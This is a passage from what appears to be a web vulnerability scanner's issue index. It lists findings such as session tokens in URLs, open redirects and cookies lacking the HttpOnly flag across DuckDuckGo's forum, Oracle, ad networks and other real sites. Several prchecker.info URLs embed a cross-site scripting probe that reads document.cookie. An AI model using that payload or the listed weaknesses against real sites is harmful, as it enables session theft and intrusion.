3.278. http://duck.co/topic/historical-traffic-stats [zdccn cookie]

3.279. http://duck.co/topic/how-to-get-similar-growth-for-2011 [zdccn cookie]

3.280. http://duck.co/topic/how-to-get-similar-growth-for-2011 [zdccn cookie]

3.281. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [zdccn cookie]

3.282. http://duck.co/topic/i-did-my-own-way-to-promote-ddg [zdccn cookie]

3.283. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [zdccn cookie]

3.284. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click [zdccn cookie]

3.285. http://duck.co/topic/logging-in-message-email-not-confirmed [zdccn cookie]

3.286. http://duck.co/topic/logging-in-message-email-not-confirmed [zdccn cookie]

3.287. http://duck.co/topic/maps [zdccn cookie]

3.288. http://duck.co/topic/maps [zdccn cookie]

3.289. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [zdccn cookie]

3.290. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines [zdccn cookie]

3.291. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [zdccn cookie]

3.292. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon [zdccn cookie]

3.293. http://duck.co/topic/post-your-ddg-sticker-photos [zdccn cookie]

3.294. http://duck.co/topic/post-your-ddg-sticker-photos [zdccn cookie]

3.295. http://duck.co/topic/q-html-entities [zdccn cookie]

3.296. http://duck.co/topic/q-html-entities [zdccn cookie]

3.297. http://duck.co/topic/searching-for-roommates-on-craigslist [zdccn cookie]

3.298. http://duck.co/topic/searching-for-roommates-on-craigslist [zdccn cookie]

3.299. http://duck.co/topic/spam-site-found [zdccn cookie]

3.300. http://duck.co/topic/spam-site-found [zdccn cookie]

3.301. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest [zdccn cookie]

3.302. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest [zdccn cookie]

3.303. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [zdccn cookie]

3.304. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional [zdccn cookie]

3.305. http://duck.co/topic/words-to-live-by [zdccn cookie]

3.306. http://duck.co/topic/words-to-live-by [zdccn cookie]

3.307. http://duck.co/topic/wot-highlighting [zdccn cookie]

3.308. http://duck.co/topic/wot-highlighting [zdccn cookie]

3.309. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.310. http://REDACTED/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]

3.311. http://www.winamp.com/ [countryCookie cookie]

3.312. http://www.winamp.com/media-player/en [countryCookie cookie]

3.313. http://www.winamp.com/skin/slick-redux/222084 [countryCookie cookie]

4. SQL statement in request parameter

4.1. http://duckduckgo.com/d.js

4.2. http://www.montrealkiosk.com/directory.php

5. Session token in URL

5.1. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitevents/

5.2. http://alterianwaserver.alterianconnect.net/tracking.aspx/submitsession/

5.3. http://bad-behavior.ioerror.us/2005/05/

5.4. http://bad-behavior.ioerror.us/2005/06/

5.5. http://bad-behavior.ioerror.us/2005/07/

5.6. http://bad-behavior.ioerror.us/2005/08/

5.7. http://bad-behavior.ioerror.us/2005/09/

5.8. http://bad-behavior.ioerror.us/2005/10/

5.9. http://bad-behavior.ioerror.us/2005/11/

5.10. http://bad-behavior.ioerror.us/2005/12/

5.11. http://bad-behavior.ioerror.us/2006/02/

5.12. http://bad-behavior.ioerror.us/2006/04/

5.13. http://bad-behavior.ioerror.us/2006/06/

5.14. http://bad-behavior.ioerror.us/2006/07/

5.15. http://bad-behavior.ioerror.us/2006/08/

5.16. http://bad-behavior.ioerror.us/2006/09/

5.17. http://bad-behavior.ioerror.us/2006/11/

5.18. http://bad-behavior.ioerror.us/2006/12/

5.19. http://bad-behavior.ioerror.us/2007/01/

5.20. http://bad-behavior.ioerror.us/2007/12/

5.21. http://bad-behavior.ioerror.us/2008/01/

5.22. http://bad-behavior.ioerror.us/2008/04/

5.23. http://bad-behavior.ioerror.us/2008/05/

5.24. http://bad-behavior.ioerror.us/2008/07/

5.25. http://bad-behavior.ioerror.us/2008/08/

5.26. http://bad-behavior.ioerror.us/2008/09/

5.27. http://bad-behavior.ioerror.us/2008/11/

5.28. http://bad-behavior.ioerror.us/2009/02/

5.29. http://bad-behavior.ioerror.us/2009/06/

5.30. http://bad-behavior.ioerror.us/2009/09/

5.31. http://bad-behavior.ioerror.us/2009/10/

5.32. http://bad-behavior.ioerror.us/2009/11/

5.33. http://bad-behavior.ioerror.us/category/akismet/

5.34. http://bad-behavior.ioerror.us/category/blog-spam/

5.35. http://bad-behavior.ioerror.us/category/blogging/

5.36. http://bad-behavior.ioerror.us/category/coppermine-photo-gallery/

5.37. http://bad-behavior.ioerror.us/category/drupal/

5.38. http://bad-behavior.ioerror.us/category/expressionengine/

5.39. http://bad-behavior.ioerror.us/category/internet/

5.40. http://bad-behavior.ioerror.us/category/joomla/

5.41. http://bad-behavior.ioerror.us/category/lifetype/

5.42. http://bad-behavior.ioerror.us/category/mediawiki/

5.43. http://bad-behavior.ioerror.us/category/open-source/

5.44. http://bad-behavior.ioerror.us/category/project-honey-pot/

5.45. http://bad-behavior.ioerror.us/category/spam/

5.46. http://bad-behavior.ioerror.us/category/windows/

5.47. http://bad-behavior.ioerror.us/category/wordpress-2-0/

5.48. http://bad-behavior.ioerror.us/category/wordpress-com/

5.49. http://bad-behavior.ioerror.us/category/wordpress/

5.50. http://bh.contextweb.com/bh/set.aspx

5.51. https://communities.oracle.com/portal/server.pt/community/support/219

5.52. https://competencycenter.oracle.com/opncc/home.cc

5.53. http://l.sharethis.com/pview

5.54. https://login.oracle.com/mysso/signon.jsp

5.55. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

5.56. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

5.57. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

5.58. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

5.59. http://mt0.googleapis.com/mapslt/ft

5.60. http://server.iad.liveperson.net/hc/43040610/

5.61. http://stackauth.com/auth/global/read

5.62. http://telligent.com/analytics.ashx

5.63. https://twitter.com/oauth/authenticate

5.64. https://twitter.com/oauth/authenticate

5.65. http://www.facebook.com/extern/login_status.php

5.66. http://www.networksolutions.com/domain-name-registration/RV8.jsp

5.67. http://www.zoho.com/

6. Open redirection

6.1. http://r.nexac.com/e/getdata.xgi [ru parameter]

6.2. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]

6.3. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]

6.4. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]

7. Cookie without HttpOnly flag set

7.1. https://accounts.zoho.com/register

7.2. http://ahmy.yulrizka.com/2011/02/my-own-url-shortening/

7.3. https://communities.oracle.com/portal/server.pt/community/support/219

7.4. http://discuss.zoho.com/getCustomFile.do

7.5. http://duck.co/

7.6. http://duck.co/duckduckgo-forum

7.7. http://duck.co/feed

7.8. http://duck.co/js/crossdomain.js

7.9. http://duck.co/jsp/i18nConstants.jsp

7.10. http://duck.co/portalLogin.do

7.11. http://duck.co/sendFeedback.do

7.12. http://duck.co/styles/discussions-styles.css

7.13. http://duck.co/styles/editorStyles.css

7.14. http://duck.co/styles/errorpage.css

7.15. http://duck.co/subscribeRegister.do

7.16. http://duck.co/topic/2-25-news-stories-to-comment-on

7.17. http://duck.co/topic/2-28-articles-to-comment-on

7.18. http://duck.co/topic/about-com-s-web-search-readers-choice-awards

7.19. http://duck.co/topic/boolean-operators-and-parentheses-for-search-query

7.20. http://duck.co/topic/cached-archived-links

7.21. http://duck.co/topic/changing-font-text-and-links

7.22. http://duck.co/topic/ddg-gg

7.23. http://duck.co/topic/ddg-in-alternative-web-browsers

7.24. http://duck.co/topic/ddg-is-one-of-zoho-s-esteemed-customers

7.25. http://duck.co/topic/ddg-own-search-engine

7.26. http://duck.co/topic/ddg-userbar-to-spread-the-word

7.27. http://duck.co/topic/default-header-color

7.28. http://duck.co/topic/differentiate-duckduckgo-with-other

7.29. http://duck.co/topic/duckduckgo-webs-com-custom-logos

7.30. http://duck.co/topic/foss-donation-nominations

7.31. http://duck.co/topic/freenet

7.32. http://duck.co/topic/historical-traffic-stats

7.33. http://duck.co/topic/how-to-get-similar-growth-for-2011

7.34. http://duck.co/topic/i-did-my-own-way-to-promote-ddg

7.35. http://duck.co/topic/i-would-love-it-iff-i-need-ideas-fast-please-click

7.36. http://duck.co/topic/logging-in-message-email-not-confirmed

7.37. http://duck.co/topic/maps

7.38. http://duck.co/topic/opera-thread-include-duckduckgo-in-default-search-engines

7.39. http://duck.co/topic/pages-without-favicon-uses-ddg-favicon

7.40. http://duck.co/topic/post-your-ddg-sticker-photos

7.41. http://duck.co/topic/q-html-entities

7.42. http://duck.co/topic/searching-for-roommates-on-craigslist

7.43. http://duck.co/topic/spam-site-found

7.44. http://duck.co/topic/userscript-which-prevents-you-from-accidentally-posting-as-guest

7.45. http://duck.co/topic/want-more-visitors-ehh-needs-to-look-more-proffesional

7.46. http://duck.co/topic/words-to-live-by

7.47. http://duck.co/topic/wot-highlighting

7.48. http://duck.co/topic/ň?┐ň?┐

7.49. http://eventreg.oracle.com/webapps/events/ns/EventsDetail.jsp

7.50. http://havefunforever.com/short-urls-with-your-domain-free-url-shortening-script/

7.51. http://img.skitch.com/20100305-d4j9uyhdfermnp92r4tjrtt61a.preview.jpg

7.52. http://landingpad.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp

7.53. https://profile.microsoft.com/RegSysProfileCenter/wizard.aspx

7.54. https://profile.microsoft.com/regsysprofilecenter/Footer.aspx

7.55. https://profile.microsoft.com/regsysprofilecenter/Header.aspx

7.56. https://profile.microsoft.com/regsysprofilecenter/rps/LeftFrame.aspx

7.57. http://shop.winamp.com/DRHM/store

7.58. http://shop.winamp.com/store/winamp/en_US/buy/productID.103591500/quantity.1/ThemeID.1279300

7.59. https://sso.springsource.com/cas/login

7.60. http://t4.trackalyzer.com/trackalyze.asp

7.61. http://tap11.com/

7.62. http://tap11.com/request_trial.htm

7.63. http://tap11.com/ws/requestTrial.json

7.64. http://telligent.com/products/telligent_community/

7.65. http://tetlaw.id.au/view/blog/prototype-class-fastinit/

7.66. http://widgets.dzone.com/links/widgets/zoneit.html

7.67. http://www.business-software.com/top-10-web-content-management-vendors.php

7.68. http://www.cafepress.com/cp/img/spacer.gif

7.69. http://www.capgemini.com/experts/

7.70. http://www.capgemini.com/registration/register/

7.71. http://www.fusionbot.com/

7.72. http://www.jrank.org/

7.73. http://www.linkedin.com/cws/share-count

7.74. http://www.networksolutions.com/domain-name-registration/RV8.jsp

7.75. http://www.opensource.org/licenses/mit-license.php

7.76. http://www.paperthin.com/marketing/Flexible-Content-Management.cfm

7.77. http://www.prchecker.info/check_page_rank.php

7.78. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/gomymammy.php

7.79. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/bn2.gif

7.80. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/cf1.jpg

7.81. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/ln1.gif

7.82. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/nch.gif

7.83. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/tbg1.jpg

7.84. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/tn2.gif

7.85. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/bgs/whh1.jpg

7.86. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/icos/newg1.gif

7.87. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/icos/newr1.gif

7.88. http://www.prchecker.info/check_page_rank.php/27f50%22%3E%3Cscript%3Ealert(document.cookie)%3C/images/logo.jpg

7.89. http://www.startlogic.com/

7.90. http://www.sti-seoservices.com/

7.91. http://www.sun.com/images/pc10/pc10_dwnlds_java_hvr.gif

7.92. http://www.sun.com/images/pc10/pc10_dwnlds_javaee.gif

7.93. http://www.sun.com/images/pc10/pc10_dwnlds_javafx_hvr.gif

7.94. http://www.sun.com/images/pc10/pc10_dwnlds_netbeans_hvr.gif

7.95. http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/

7.96. http://www.virtusa.com/

7.97. http://www.virtusa.com/blog/

7.98. http://www.visitortracklog.com/loghit.asp

7.99. http://www.watchmouse.com/en/api/checkreferrer.php

7.100. http://www.wolframalpha.com/input/

7.101. https://www14.software.ibm.com/webapp/iwm/web/signup.do

7.102. http://www4d.wolframalpha.com/input/pod.jsp

7.103. http://www4d.wolframalpha.com/input/queries.aside.jsp

7.104. http://www4d.wolframalpha.com/input/recalculate.jsp

7.105. http://ad.au.doubleclick.net/clk

7.106. http://ad.yieldmanager.com/pixel

7.107. http://ad.yieldmanager.com/unpixel

7.108. http://adam.companypond.com/peeps.php

7.109. http://ads.adbrite.com/adserver/behavioral-data/8201

7.110. http://ads.adbrite.com/adserver/vdi/712156

7.111. http://ads.undertone.com/afr.php

7.112. http://ads.undertone.com/l

7.113. http://ak1.abmr.net/is/ads.undertone.com

7.114. http://api.postup.com/TCTUL001/twidget/1.jsonp

7.115. http://ar.atwola.com/atd

7.116. http://ar.voicefive.com/b/wc_beacon.pli

7.117. http://ar.voicefive.com/bmx3/broker.pli

7.118. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/noperf=1

7.119. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=125x125

7.120. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=728x90

7.121. http://b.aol.com/master/

7.122. http://b.scorecardresearch.com/b

7.123. http://b.voicefive.com/b

7.124. http://b.winamp.com/vanity/

7.125. http://bad-behavior.ioerror.us/2005/04/

7.126. http://bad-behavior.ioerror.us/2005/05/

7.127. http://bad-behavior.ioerror.us/2005/06/

7.128. http://bad-behavior.ioerror.us/2005/07/

7.129. http://bad-behavior.ioerror.us/2005/08/

7.130. http://bad-behavior.ioerror.us/2005/09/

7.131. http://bad-behavior.ioerror.us/2005/10/

7.132. http://bad-behavior.ioerror.us/2005/11/

7.133. http://bad-behavior.ioerror.us/2005/12/

7.134. http://bad-behavior.ioerror.us/2006/01/

7.135. http://bad-behavior.ioerror.us/2006/02/

7.136. http://bad-behavior.ioerror.us/2006/03/

7.137. http://bad-behavior.ioerror.us/2006/04/

7.138. http://bad-behavior.ioerror.us/2006/05/

7.139. http://bad-behavior.ioerror.us/2006/06/

7.140. http://bad-behavior.ioerror.us/2006/07/

7.141. http://bad-behavior.ioerror.us/2006/08/

7.142. http://bad-behavior.ioerror.us/2006/09/

7.143. http://bad-behavior.ioerror.us/2006/11/

7.144. http://bad-behavior.ioerror.us/2006/12/

7.145. http://bad-behavior.ioerror.us/2007/01/

7.146. http://bad-behavior.ioerror.us/2007/04/

7.147. http://bad-behavior.ioerror.us/2007/12/

7.148. http://bad-behavior.ioerror.us/2008/01/

7.149. http://bad-behavior.ioerror.us/2008/02/

7.150. http://bad-behavior.ioerror.us/2008/04/

7.151. http://bad-behavior.ioerror.us/2008/05/

7.152. http://bad-behavior.ioerror.us/2008/07/

7.153. http://bad-behavior.ioerror.us/2008/08/

7.154. http://bad-behavior.ioerror.us/2008/09/

7.155. http://bad-behavior.ioerror.us/2008/11/

7.156. http://bad-behavior.ioerror.us/2008/12/

7.157. http://bad-behavior.ioerror.us/2009/02/

7.158. http://bad-behavior.ioerror.us/2009/06/

7.159. http://bad-behavior.ioerror.us/2009/09/

7.160. http://bad-behavior.ioerror.us/2009/10/

7.161. http://bad-behavior.ioerror.us/2009/11/

7.162. http://bad-behavior.ioerror.us/2009/12/

7.163. http://bad-behavior.ioerror.us/2010/02/

7.164. http://bad-behavior.ioerror.us/2010/07/

7.165. http://bad-behavior.ioerror.us/2010/08/

7.166. http://bad-behavior.ioerror.us/2011/01/

7.167. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/

7.168. http://bad-behavior.ioerror.us/2011/01/25/bad-behavior-2-0-40/

7.169. http://bad-behavior.ioerror.us/2011/01/25/bad-behavior-2-1-9/

7.170. http://bad-behavior.ioerror.us/2011/01/27/bad-behavior-2-0-41-and-2-1-10/

7.171. http://bad-behavior.ioerror.us/2011/02/

7.172. http://bad-behavior.ioerror.us/2011/02/15/bad-behavior-2-0-42-and-2-1-11/

7.173. http://bad-behavior.ioerror.us/blog/

7.174. http://bad-behavior.ioerror.us/category/akismet/

7.175. http://bad-behavior.ioerror.us/category/bad-behavior/

7.176. http://bad-behavior.ioerror.us/category/blog-spam/

7.177. http://bad-behavior.ioerror.us/category/blogging/

7.178. http://bad-behavior.ioerror.us/category/coppermine-photo-gallery/

7.179. http://bad-behavior.ioerror.us/category/cyveillance/

7.180. http://bad-behavior.ioerror.us/category/drupal/

7.181. http://bad-behavior.ioerror.us/category/expressionengine/

7.182. http://bad-behavior.ioerror.us/category/firefox/

7.183. http://bad-behavior.ioerror.us/category/godaddy/

7.184. http://bad-behavior.ioerror.us/category/google/

7.185. http://bad-behavior.ioerror.us/category/internet-explorer/

7.186. http://bad-behavior.ioerror.us/category/internet/

7.187. http://bad-behavior.ioerror.us/category/joomla/

7.188. http://bad-behavior.ioerror.us/category/lifetype/

7.189. http://bad-behavior.ioerror.us/category/mediawiki/

7.190. http://bad-behavior.ioerror.us/category/open-source/

7.191. http://bad-behavior.ioerror.us/category/personal/

7.192. http://bad-behavior.ioerror.us/category/php/

7.193. http://bad-behavior.ioerror.us/category/project-honey-pot/

7.194. http://bad-behavior.ioerror.us/category/spam/

7.195. http://bad-behavior.ioerror.us/category/windows/

7.196. http://bad-behavior.ioerror.us/category/wordpress-1-6/

7.197. http://bad-behavior.ioerror.us/category/wordpress-2-0/

7.198. http://bad-behavior.ioerror.us/category/wordpress-2-1/

7.199. http://bad-behavior.ioerror.us/category/wordpress-com/

7.200. http://bad-behavior.ioerror.us/category/wordpress/

7.201. http://bad-behavior.ioerror.us/category/wp-spamfree/

7.202. http://bad-behavior.ioerror.us/comments/feed/

7.203. http://bad-behavior.ioerror.us/contact/

7.204. http://bad-behavior.ioerror.us/documentation/

7.205. http://bad-behavior.ioerror.us/documentation/benefits/

7.206. http://bad-behavior.ioerror.us/documentation/connector/

7.207. http://bad-behavior.ioerror.us/documentation/how-it-works/

7.208. http://bad-behavior.ioerror.us/documentation/spam-prevention-strategy/

7.209. http://bad-behavior.ioerror.us/documentation/who-uses-bad-behavior/

7.210. http://bad-behavior.ioerror.us/donate/

7.211. http://bad-behavior.ioerror.us/download/

7.212. http://bad-behavior.ioerror.us/faq/

7.213. http://bad-behavior.ioerror.us/feed/

7.214. http://bad-behavior.ioerror.us/feed/atom/

7.215. http://bad-behavior.ioerror.us/feed/rss/

7.216. http://bad-behavior.ioerror.us/index.php

7.217. http://bad-behavior.ioerror.us/srv/www/ioerror.us/wp-content/plugins/word-press-flow-player/flowplayer/flowplayer-3.1.4.min.js

7.218. http://bad-behavior.ioerror.us/trackback/

7.219. http://bad-behavior.ioerror.us/wp-content/themes/unnamed-one-10-stable/js/livesearch.js.php

7.220. http://bad-behavior.ioerror.us/wp-content/themes/unnamed-one-10-stable/livesearch.php

7.221. http://bad-behavior.ioerror.us/wp-content/themes/unnamed-one-10-stable/unnamed-css.php

7.222. http://bad-behavior.ioerror.us/wp-login.php

7.223. http://bad-behavior.ioerror.us/xmlrpc.php

7.224. http://bh.contextweb.com/bh/set.aspx

7.225. http://bs.serving-sys.com/BurstingPipe/adServer.bs

7.226. http://bstats.adbrite.com/click/bstats.gif

7.227. http://capgeminicom.112.2o7.net/b/ss/capgeminicom/0/FAS-1.3/s98757477793842

7.228. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s91173577997833

7.229. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92401193352416

7.230. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92505897325463

7.231. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s92603963012807

7.232. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93442722123581

7.233. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93582125916145

7.234. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s93708241570275

7.235. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s94834942873567

7.236. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s95697672062087

7.237. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96224887147545

7.238. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96921465278137

7.239. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s96949669870082

7.240. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s97269068704918

7.241. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98346089529804

7.242. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98501219481695

7.243. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98762076739221

7.244. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s98839918370358

7.245. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s99187269594985

7.246. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s99299144083634

7.247. http://capgeminicomglobal.112.2o7.net/b/ss/capgeminicomglobal,capgeminicom/1/H.17/s9971707289572

7.248. https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start

7.249. https://client.trafficshaping.com/favicon.ico

7.250. https://client.trafficshaping.com/feedback

7.251. https://client.trafficshaping.com/pricing

7.252. https://client.trafficshaping.com/signin

7.253. http://clients1.google.com/webpagethumbnail

7.254. http://code.google.com/p/swfobject/

7.255. http://companypond.com/

7.256. https://competencycenter.oracle.com/opncc/home.cc

7.257. http://cspix.media6degrees.com/orbserv/hbpix

7.258. http://d.businessinsider.com/ajs.php

7.259. http://d.businessinsider.com/lg.php

7.260. http://davidwalsh.name/wp-content/plugins/wp-spamfree/js/wpsf-js.php

7.261. http://ds.addthis.com/red/psi/sites/iwantmyname.com/p.json

7.262. http://ds.addthis.com/red/psi/sites/www.capgemini.com/p.json

7.263. http://eatps.web.aol.com:9000/open_web_adhoc

7.264. http://forums.winamp.com/

7.265. http://forums.winamp.com/forumdisplay.php

7.266. http://hootsuite.com/

7.267. http://i.kissmetrics.com/i.js

7.268. http://ilove.klout.com/tr.gif

7.269. http://image2.pubmatic.com/AdServer/Pug

7.270. http://in.getclicky.com/in.php

7.271. http://int.teracent.net/tase/int

7.272. http://ioerror.us/srv/www/ioerror.us/wp-content/plugins/word-press-flow-player/flowplayer/flowplayer-3.1.4.min.js

7.273. http://klout.com/

7.274. https://lct.salesforce.com/sfga.js

7.275. http://leadback.advertising.com/adcedge/lb

7.276. http://lfov.net/favicon.ico

7.277. http://lfov.net/webrecorder/g/chimera.js

7.278. http://lfov.net/webrecorder/js/listen.js

7.279. http://lfov.net/webrecorder/w

7.280. http://lilypad-cdn.cranberry.com/img/03de784d-7023-4738-b047-322e3d5d9b82/60/myrtle-beach-seo.jpg

7.281. http://lilypad-cdn.cranberry.com/img/07bf76c7-ed08-4604-8bff-2d07e9fe3ff1/60/robleroy.jpg

7.282. http://lilypad-cdn.cranberry.com/img/0a9d4a79-d7b5-4478-98f6-6f2c3d4acd38/60/shonaliburke.jpg

7.283. http://lilypad-cdn.cranberry.com/img/0cc45e76-631e-4b23-98d6-2ec114702e80/60/instockkitchens.jpg

7.284. http://lilypad-cdn.cranberry.com/img/0fb42f46-697b-4368-abb4-474a56905435/60/hunzasoft.jpg

7.285. http://lilypad-cdn.cranberry.com/img/0fffbfc2-8a18-4a22-bda7-3e674a585bc5/60/pigblimp.jpg

7.286. http://lilypad-cdn.cranberry.com/img/124b12f2-5eb0-4738-885a-3e4162420fee/60/emedicalmedia.jpg

7.287. http://lilypad-cdn.cranberry.com/img/16a566bf-a072-4f93-825d-045768ad5b6e/60/frankmlamark.jpg

7.288. http://lilypad-cdn.cranberry.com/img/1b5d13c6-263b-4045-85ed-8b94e1f0239c/60/sdmackpictures.jpg

7.289. http://lilypad-cdn.cranberry.com/img/21e8fb5b-3438-4c59-93f7-af82f5a3ab19/60/listdummy.jpg

7.290. http://lilypad-cdn.cranberry.com/img/25adef58-6895-4904-be32-3ad23f6c239f/60/caryburch.jpg

7.291. http://lilypad-cdn.cranberry.com/img/299ddeec-d45a-47fd-b8d6-75554fd1d278/60/itnmark.jpg

7.292. http://lilypad-cdn.cranberry.com/img/3f0130a1-6fc9-4d39-9cd1-7229268a9d72/60/robertouimet.jpg

7.293. http://lilypad-cdn.cranberry.com/img/478ce290-40ff-4cb7-b7cc-04603d027cba/60/katybarrilleaux.jpg

7.294. http://lilypad-cdn.cranberry.com/img/480bfcaa-6f10-466b-9a60-632362fc4ff4/60/jmcdaid.jpg

7.295. http://lilypad-cdn.cranberry.com/img/4df7f1a4-4e91-4d74-a4b5-043a1442e4f5/60/simusync.jpg

7.296. http://lilypad-cdn.cranberry.com/img/53b69f73-b55b-4427-ad9e-2075ed70a265/60/cmcmediagroup.jpg

7.297. http://lilypad-cdn.cranberry.com/img/6178b5ca-4f23-47b3-9483-668b0818d178/60/bryaneisenberg.jpg

7.298. http://lilypad-cdn.cranberry.com/img/67bcf2f6-5919-4a34-a7b3-5a7e05e2d519/60/truxperts.jpg

7.299. http://lilypad-cdn.cranberry.com/img/69c3eb8a-3fd9-41f4-afef-279eaeb48289/60/technologycafe.jpg

7.300. http://lilypad-cdn.cranberry.com/img/6f85506b-2261-4f0d-9bf2-4a36ec6a4b48/60/stevelevin.jpg

7.301. http://lilypad-cdn.cranberry.com/img/77fd9e04-d3c3-4bed-b428-19ad8753000d/60/bestlaptops.jpg

7.302. http://lilypad-cdn.cranberry.com/img/7824ed85-00de-40a5-86a2-32430a842b0c/60/rosennissanwi.jpg

7.303. http://lilypad-cdn.cranberry.com/img/7827d25d-979e-45cb-af1a-116c92e7d4d2/60/eugenearmstead.jpg

7.304. http://lilypad-cdn.cranberry.com/img/7b1db2ab-224b-4b0d-b22b-fc67981fa81d/60/mlaphotonix.jpg

7.305. http://lilypad-cdn.cranberry.com/img/7c0d8404-d29c-4808-b348-4e733eb39834/60/equitydirectfunding.jpg

7.306. http://lilypad-cdn.cranberry.com/img/80e97cb7-c04b-4e86-8f58-fcd62c3ac552/60/newmediaphoto.jpg

7.307. http://lilypad-cdn.cranberry.com/img/84df315b-2220-4d61-8eb6-b504507fc808/60/mimbeo.jpg

7.308. http://lilypad-cdn.cranberry.com/img/87c99f62-68e8-4f09-ad39-eb67803cf3ea/60/niklassjostrom.jpg

7.309. http://lilypad-cdn.cranberry.com/img/949399df-6e15-4c2d-9b55-c18bb06baa7d/60/adpenterprises.jpg

7.310. http://lilypad-cdn.cranberry.com/img/982eeee3-f698-41d5-80f1-e06c21ccfb2e/60/optimum7.jpg

7.311. http://lilypad-cdn.cranberry.com/img/9f26281d-6844-4d2d-bab6-69c65586d1b2/60/chrisrusselltruste.jpg

7.312. http://lilypad-cdn.cranberry.com/img/a3591179-78bd-4d14-8de7-0742f61fb5da/60/urduworld.jpg

7.313. http://lilypad-cdn.cranberry.com/img/a6d1fa13-4e26-4abd-b4ee-939b50e6b2e4/60/kazionetworks.jpg

7.314. http://lilypad-cdn.cranberry.com/img/a8109d25-2ef4-4354-ac43-f961c29dc500/60/talleytrans.jpg

7.315. http://lilypad-cdn.cranberry.com/img/a9c17b4f-b5a9-491b-82c4-4dfcfa1442e8/60/davidmcinnis.jpg

7.316. http://lilypad-cdn.cranberry.com/img/aae29329-8a31-4730-b458-51883a71a5db/60/unique.jpg

7.317. http://lilypad-cdn.cranberry.com/img/acb9473d-d0e8-49f5-b90c-fa6dff5a2078/60/adpentllc.jpg

7.318. http://lilypad-cdn.cranberry.com/img/afecbbaf-c180-4c9c-8c18-7a89b57576c6/60/hutherllc.jpg

7.319. http://lilypad-cdn.cranberry.com/img/b9808445-00af-4ade-a2e7-bffd6f80faf5/60/customfit.jpg

7.320. http://lilypad-cdn.cranberry.com/img/bc490cfe-7e4c-4ef5-baeb-86e659cfdae2/60/natemichael.jpg

7.321. http://lilypad-cdn.cranberry.com/img/bfe075a0-f893-4d48-a930-31fd68330ce0/60/healthclick.jpg

